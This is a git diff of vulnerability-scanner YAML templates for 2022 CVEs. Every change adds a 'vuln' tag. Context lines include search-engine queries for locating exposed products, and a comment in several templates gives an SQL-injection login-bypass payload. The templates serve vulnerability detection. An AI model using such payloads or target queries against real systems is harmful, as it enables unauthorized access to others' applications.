918e50bb3da..28f81bfcf13 100644 --- a/http/cves/2022/CVE-2022-31137.yaml +++ b/http/cves/2022/CVE-2022-31137.yaml @@ -32,7 +32,7 @@ info: - http.html:"Roxy-WI" - http.html:"roxy-wi" fofa-query: body="roxy-wi" - tags: cve2022,cve,rce,roxy,roxy-wi,vkev + tags: cve2022,cve,rce,roxy,roxy-wi,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31161.yaml b/http/cves/2022/CVE-2022-31161.yaml index 71b13298b0d..794b2e96579 100644 --- a/http/cves/2022/CVE-2022-31161.yaml +++ b/http/cves/2022/CVE-2022-31161.yaml @@ -29,7 +29,7 @@ info: product: roxy-wi shodan-query: html:"Roxy-WI" fofa-query: body="roxy-wi" - tags: cve2022,cve,rce,roxy,roxy-wi,vkev + tags: cve2022,cve,rce,roxy,roxy-wi,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31181.yaml b/http/cves/2022/CVE-2022-31181.yaml index 8cecd1ca16c..4c43e7cf203 100644 --- a/http/cves/2022/CVE-2022-31181.yaml +++ b/http/cves/2022/CVE-2022-31181.yaml @@ -31,7 +31,7 @@ info: - http.component:"Prestashop" - cpe:"cpe:2.3:a:prestashop:prestashop" - http.component:"prestashop" - tags: cve,cve2022,prestashop,rce,intrusive,vkev + tags: cve,cve2022,prestashop,rce,intrusive,vkev,vuln variables: first_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}" diff --git a/http/cves/2022/CVE-2022-3124.yaml b/http/cves/2022/CVE-2022-3124.yaml index 93fae3e9b44..4ae08394a23 100644 --- a/http/cves/2022/CVE-2022-3124.yaml +++ b/http/cves/2022/CVE-2022-3124.yaml @@ -24,7 +24,7 @@ info: product: frontend_file_manager framework: wordpress publicwww-query: "/wp-content/plugins/nmedia-user-file-uploader/" - tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive,vkev + tags: cve,cve2022,wordpress,wp-plugin,wpscan,nmedia-user-file-uploader,file-upload,intrusive,vkev,vuln variables: rand_string: '{{to_lower(rand_text_alpha(6))}}' diff --git a/http/cves/2022/CVE-2022-31260.yaml b/http/cves/2022/CVE-2022-31260.yaml index 7c763f77142..bfd1ad1556c 100644 --- a/http/cves/2022/CVE-2022-31260.yaml +++ b/http/cves/2022/CVE-2022-31260.yaml @@ -28,7 +28,7 @@ info: product: resourcespace shodan-query: title:"ResourceSpace" fofa-query: title="ResourceSpace" - tags: cve,cve2022,resourcespace,misconfig + tags: cve,cve2022,resourcespace,misconfig,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31268.yaml b/http/cves/2022/CVE-2022-31268.yaml index 270e8056cd2..bb3228f47b7 100644 --- a/http/cves/2022/CVE-2022-31268.yaml +++ b/http/cves/2022/CVE-2022-31268.yaml @@ -37,7 +37,7 @@ info: - title="gitblit" - body="gitblit" google-query: intitle:"gitblit" - tags: cve,cve2022,lfi,gitblit + tags: cve,cve2022,lfi,gitblit,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index 4813bcb6e9d..7f682eba632 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"linear emerge" - intitle:"emerge" - tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol + tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index 7eaa140b351..16f2883551c 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: angtech product: haraj - tags: cve,cve2022,haraj,xss,angtech + tags: cve,cve2022,haraj,xss,angtech,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index 2f5e088b2a1..56748b28be7 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -33,7 +33,7 @@ info: - http.html:"SolarView Compact" - http.html:"solarview compact" fofa-query: body="solarview compact" - tags: cve2022,cve,xss,solarview,contec + tags: cve2022,cve,xss,solarview,contec,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 0243c406eb3..3857a1adac4 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/nex-forms-express-wp-form-builder/ fofa-query: body=/wp-content/plugins/nex-forms-express-wp-form-builder/ publicwww-query: /wp-content/plugins/nex-forms-express-wp-form-builder/ - tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline + tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31470.yaml b/http/cves/2022/CVE-2022-31470.yaml index f3542c242f5..bc9161e4366 100644 --- a/http/cves/2022/CVE-2022-31470.yaml +++ b/http/cves/2022/CVE-2022-31470.yaml @@ -24,7 +24,7 @@ info: product: webmail shodan-query: title:"Axigen" fofa-query: title="Axigen" - tags: cve,cve2022,axigen,webmail,xss + tags: cve,cve2022,axigen,webmail,xss,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index b1b9864e2ad..ff133d89de5 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -27,7 +27,7 @@ info: vendor: ithemes product: backupbuddy framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes,vkev + tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31499.yaml b/http/cves/2022/CVE-2022-31499.yaml index 565fdc87155..17c3811752b 100644 --- a/http/cves/2022/CVE-2022-31499.yaml +++ b/http/cves/2022/CVE-2022-31499.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"linear emerge" - intitle:"emerge" - tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol,vkev + tags: time-based-sqli,cve,cve2022,packetstorm,emerge,rce,nortekcontrol,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 6983a35ac32..195d4cce096 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -33,7 +33,7 @@ info: fofa-query: - icon_hash=-1250474341 - app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize" - tags: cve2022,cve,vmware,lfi,vkev + tags: cve2022,cve,vmware,lfi,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31704.yaml b/http/cves/2022/CVE-2022-31704.yaml index a8eb70151ed..918e7bfa9c3 100644 --- a/http/cves/2022/CVE-2022-31704.yaml +++ b/http/cves/2022/CVE-2022-31704.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" - tags: cve,cve2022,vmware,vrealize,rce,lfi,passive,vkev + tags: cve,cve2022,vmware,vrealize,rce,lfi,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31706.yaml b/http/cves/2022/CVE-2022-31706.yaml index 9d50952f569..8ec13cc2ea5 100644 --- a/http/cves/2022/CVE-2022-31706.yaml +++ b/http/cves/2022/CVE-2022-31706.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" - tags: cve,cve2022,vmware,vrealize,rce,lfi,passive,vkev + tags: cve,cve2022,vmware,vrealize,rce,lfi,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31711.yaml b/http/cves/2022/CVE-2022-31711.yaml index 6f6ce41b6ce..b0f3367508b 100644 --- a/http/cves/2022/CVE-2022-31711.yaml +++ b/http/cves/2022/CVE-2022-31711.yaml @@ -26,7 +26,7 @@ info: shodan-query: http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" - tags: cve,cve2022,vmware,exposure,passive,vkev + tags: cve,cve2022,vmware,exposure,passive,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index 48d6f0d9e9f..d78ef036d24 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"linear emerge" - intitle:"emerge" - tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol + tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31814.yaml b/http/cves/2022/CVE-2022-31814.yaml index 2811b8e647a..d96b2f6f98e 100644 --- a/http/cves/2022/CVE-2022-31814.yaml +++ b/http/cves/2022/CVE-2022-31814.yaml @@ -30,7 +30,7 @@ info: vendor: netgate product: pfblockerng framework: pfsense - tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate,vkev + tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31845.yaml b/http/cves/2022/CVE-2022-31845.yaml index 12531ac50ea..2b4be93ecee 100644 --- a/http/cves/2022/CVE-2022-31845.yaml +++ b/http/cves/2022/CVE-2022-31845.yaml @@ -35,7 +35,7 @@ info: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,wavlink,exposure + tags: cve,cve2022,wavlink,exposure,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31846.yaml b/http/cves/2022/CVE-2022-31846.yaml index daab672a551..472bf2eb6a9 100644 --- a/http/cves/2022/CVE-2022-31846.yaml +++ b/http/cves/2022/CVE-2022-31846.yaml @@ -37,7 +37,7 @@ info: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,wavlink,exposure + tags: cve,cve2022,wavlink,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31847.yaml b/http/cves/2022/CVE-2022-31847.yaml index 9783495d7ac..cd957c2c982 100644 --- a/http/cves/2022/CVE-2022-31847.yaml +++ b/http/cves/2022/CVE-2022-31847.yaml @@ -32,7 +32,7 @@ info: - http.html:"Wavlink" - http.html:"wavlink" fofa-query: body="wavlink" - tags: cve,cve2022,wavlink,exposure,vkev + tags: cve,cve2022,wavlink,exposure,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index 10677a68826..0e5b9f90452 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -29,7 +29,7 @@ info: max-request: 4 vendor: codologic product: codoforum - tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic + tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31974.yaml b/http/cves/2022/CVE-2022-31974.yaml index 7fe02f7164e..2c2f684c083 100644 --- a/http/cves/2022/CVE-2022-31974.yaml +++ b/http/cves/2022/CVE-2022-31974.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project,vuln variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-31975.yaml b/http/cves/2022/CVE-2022-31975.yaml index 94663bb1eca..2cbe1f3d192 100644 --- a/http/cves/2022/CVE-2022-31975.yaml +++ b/http/cves/2022/CVE-2022-31975.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project,vuln variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-31976.yaml b/http/cves/2022/CVE-2022-31976.yaml index cdcfd3b5854..779af254a4c 100644 --- a/http/cves/2022/CVE-2022-31976.yaml +++ b/http/cves/2022/CVE-2022-31976.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31977.yaml b/http/cves/2022/CVE-2022-31977.yaml index f085f205c7e..ade25e3f9b1 100644 --- a/http/cves/2022/CVE-2022-31977.yaml +++ b/http/cves/2022/CVE-2022-31977.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index 364b349d3db..6baf7c4b43c 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project + tags: time-based-sqli,cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index 68db48871d1..cfc97379fed 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_fire_reporting_system_project product: online_fire_reporting_system - tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project,vkev + tags: cve2022,cve,sqli,online-fire-reporting,online_fire_reporting_system_project,vkev,vuln variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-32007.yaml b/http/cves/2022/CVE-2022-32007.yaml index 90e5f04f2f3..e65881cce55 100644 --- a/http/cves/2022/CVE-2022-32007.yaml +++ b/http/cves/2022/CVE-2022-32007.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: complete_online_job_search_system_project product: complete_online_job_search_system - tags: cve,cve2022,sqli,eris,authenticated,complete_online_job_search_system_project + tags: cve,cve2022,sqli,eris,authenticated,complete_online_job_search_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 417a042964d..753e4b0570e 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: complete_online_job_search_system_project product: complete_online_job_search_system - tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project + tags: cve,cve2022,sqli,jobsearch,complete_online_job_search_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index a7d72219e4b..f18cd014278 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: complete_online_job_search_system_project product: complete_online_job_search_system - tags: cve,cve2022,sqli,complete_online_job_search_system_project + tags: cve,cve2022,sqli,complete_online_job_search_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32022.yaml b/http/cves/2022/CVE-2022-32022.yaml index 92ae2399724..99c2aefc177 100644 --- a/http/cves/2022/CVE-2022-32022.yaml +++ b/http/cves/2022/CVE-2022-32022.yaml @@ -31,7 +31,7 @@ info: - http.html:"Car Rental Management System" - http.html:"car rental management system" fofa-query: body="car rental management system" - tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project + tags: cve,cve2022,carrental,cms,sqli,login-bypass,car_rental_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-32024.yaml b/http/cves/2022/CVE-2022-32024.yaml index ba0d88181b7..8da4809cdec 100644 --- a/http/cves/2022/CVE-2022-32024.yaml +++ b/http/cves/2022/CVE-2022-32024.yaml @@ -31,7 +31,7 @@ info: - http.html:"car rental management system" fofa-query: body="car rental management system" comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project + tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 537d172ba4b..fce288b6788 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -32,7 +32,7 @@ info: - http.html:"car rental management system" fofa-query: body="car rental management system" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project + tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index 181eaaf49e0..273f0552a91 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -33,7 +33,7 @@ info: - http.html:"car rental management system" fofa-query: body="car rental management system" comment: Login bypass is also possible using the payload- admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project + tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index 0bcc889a150..7580e77a520 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -32,7 +32,7 @@ info: - http.html:"car rental management system" fofa-query: body="car rental management system" comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username. - tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project + tags: cve,cve2022,carrental,cms,sqli,authenticated,car_rental_management_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-32094.yaml b/http/cves/2022/CVE-2022-32094.yaml index 055f9feb2ec..feab6d815ab 100644 --- a/http/cves/2022/CVE-2022-32094.yaml +++ b/http/cves/2022/CVE-2022-32094.yaml @@ -32,7 +32,7 @@ info: - http.html:"Hospital Management System" - http.html:"hospital management system" fofa-query: body="hospital management system" - tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project + tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 56a44b92699..2e004137694 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -34,7 +34,7 @@ info: - http.html:"open edx" fofa-query: body="open edx" comment: Hover the cursor on the redirect link - tags: cve,cve2022,openedx,xss,edx + tags: cve,cve2022,openedx,xss,edx,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 46d6dfe3115..c351a6c33a7 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -30,7 +30,7 @@ info: product: i3geo shodan-query: http.html:"i3geo" fofa-query: body="i3geo" - tags: cve2022,cve,i3geo,lfi,softwarepublico,vkev + tags: cve2022,cve,i3geo,lfi,softwarepublico,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-3242.yaml b/http/cves/2022/CVE-2022-3242.yaml index eace2d3f69c..e79421299f3 100644 --- a/http/cves/2022/CVE-2022-3242.yaml +++ b/http/cves/2022/CVE-2022-3242.yaml @@ -30,7 +30,7 @@ info: fofa-query: - body="microweber" - icon_hash=780351152 - tags: cve,cve2022,huntr,xss,microweber + tags: cve,cve2022,huntr,xss,microweber,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 1359ea212bf..a0e0b816086 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -30,7 +30,7 @@ info: vendor: megatech product: msnswitch_firmware shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132 - tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech + tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml index b1f295f4e93..6d3747f598e 100644 --- a/http/cves/2022/CVE-2022-32430.yaml +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -24,7 +24,7 @@ info: product: lin-cms-spring-boot shodan-query: http.html:"心上无垢,林间有风" fofa-query: body="心上无垢,林间有风" - tags: cve,cve2022,lin-cms,auth-bypass,talelin + tags: cve,cve2022,lin-cms,auth-bypass,talelin,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32444.yaml b/http/cves/2022/CVE-2022-32444.yaml index bc4356090c0..bcd6d449314 100644 --- a/http/cves/2022/CVE-2022-32444.yaml +++ b/http/cves/2022/CVE-2022-32444.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: yuba product: u5cms - tags: cve,cve2022,redirect,u5cms,cms,yuba + tags: cve,cve2022,redirect,u5cms,cms,yuba,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32770.yaml b/http/cves/2022/CVE-2022-32770.yaml index 5037b62214e..9d3ea762855 100644 --- a/http/cves/2022/CVE-2022-32770.yaml +++ b/http/cves/2022/CVE-2022-32770.yaml @@ -33,7 +33,7 @@ info: - http.html:"AVideo" - http.html:"avideo" fofa-query: body="avideo" - tags: cve2022,cve,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32771.yaml b/http/cves/2022/CVE-2022-32771.yaml index 10f9e080f0b..45485e08a89 100644 --- a/http/cves/2022/CVE-2022-32771.yaml +++ b/http/cves/2022/CVE-2022-32771.yaml @@ -33,7 +33,7 @@ info: - http.html:"AVideo" - http.html:"avideo" fofa-query: body="avideo" - tags: cve,cve2022,avideo,xss,wwbn + tags: cve,cve2022,avideo,xss,wwbn,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-32772.yaml b/http/cves/2022/CVE-2022-32772.yaml index 8989331f2bd..048e42fa26d 100644 --- a/http/cves/2022/CVE-2022-32772.yaml +++ b/http/cves/2022/CVE-2022-32772.yaml @@ -33,7 +33,7 @@ info: - http.html:"AVideo" - http.html:"avideo" fofa-query: body="avideo" - tags: cve2022,cve,avideo,xss,wwbn + tags: cve2022,cve,avideo,xss,wwbn,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-33119.yaml b/http/cves/2022/CVE-2022-33119.yaml index ca4570ee211..37044547a5c 100644 --- a/http/cves/2022/CVE-2022-33119.yaml +++ b/http/cves/2022/CVE-2022-33119.yaml @@ -33,7 +33,7 @@ info: - http.html:"NVRsolo" - http.html:"nvrsolo" fofa-query: body="nvrsolo" - tags: cve,cve2022,nvrsolo,xss,nuuo + tags: cve,cve2022,nvrsolo,xss,nuuo,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 8144d0b8159..d75ed8d0f43 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -33,7 +33,7 @@ info: - http.html:"Powertek" - http.html:"powertek" fofa-query: body="powertek" - tags: cve2022,cve,powertek,auth-bypass,powertekpdus + tags: cve2022,cve,powertek,auth-bypass,powertekpdus,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 0ed1f1327bc..fd74ddc48c9 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -37,7 +37,7 @@ info: - body="/apps/imt/html/" - title="spark master at" google-query: intitle:"spark master at" - tags: cve2022,cve,apache,spark,kev,packetstorm,vkev + tags: cve2022,cve,apache,spark,kev,packetstorm,vkev,vuln variables: command: "echo CVE-2022-33891 | rev" diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index ae774424ad7..1a5e29336e7 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -29,7 +29,7 @@ info: vendor: multisafepay product: multisafepay_plugin_for_woocommerce framework: wordpress - tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce + tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-33965.yaml b/http/cves/2022/CVE-2022-33965.yaml index b4bc27102a4..23d52fac169 100644 --- a/http/cves/2022/CVE-2022-33965.yaml +++ b/http/cves/2022/CVE-2022-33965.yaml @@ -33,7 +33,7 @@ info: shodan-query: http.html:"wp-stats-manager" fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" - tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market + tags: time-based-sqli,cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index 1dfb4e270c9..31b274aafb3 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -36,7 +36,7 @@ info: - body="wn530hg4" - title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,wavlink,exposure + tags: cve,cve2022,wavlink,exposure,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index 842033fbaae..de827f0f650 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -37,7 +37,7 @@ info: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,packetstorm,wavlink,router,exposure + tags: cve,cve2022,packetstorm,wavlink,router,exposure,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 4659832f771..cd42682354b 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -37,7 +37,7 @@ info: - body="wn530hg4" - title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,wavlink,router,exposure,packetstorm + tags: cve,cve2022,wavlink,router,exposure,packetstorm,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34048.yaml b/http/cves/2022/CVE-2022-34048.yaml index c8fb5e7f4ed..8d12a8e8c60 100644 --- a/http/cves/2022/CVE-2022-34048.yaml +++ b/http/cves/2022/CVE-2022-34048.yaml @@ -37,7 +37,7 @@ info: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" - tags: cve2022,cve,wavlink,xss,router,edb + tags: cve2022,cve,wavlink,xss,router,edb,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34049.yaml b/http/cves/2022/CVE-2022-34049.yaml index c38b12fef48..0b14c126123 100644 --- a/http/cves/2022/CVE-2022-34049.yaml +++ b/http/cves/2022/CVE-2022-34049.yaml @@ -37,7 +37,7 @@ info: - body="wn530hg4" - title="wi-fi app login" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,wavlink,router,exposure + tags: cve,cve2022,wavlink,router,exposure,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index 4518dcf2dcd..9bb986a92ea 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -27,7 +27,7 @@ info: product: i3geo shodan-query: http.html:"i3geo" fofa-query: body="i3geo" - tags: cve,cve2022,i3geo,xss,softwarepublico + tags: cve,cve2022,i3geo,xss,softwarepublico,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index aa719452ee9..420b25e766d 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -27,7 +27,7 @@ info: 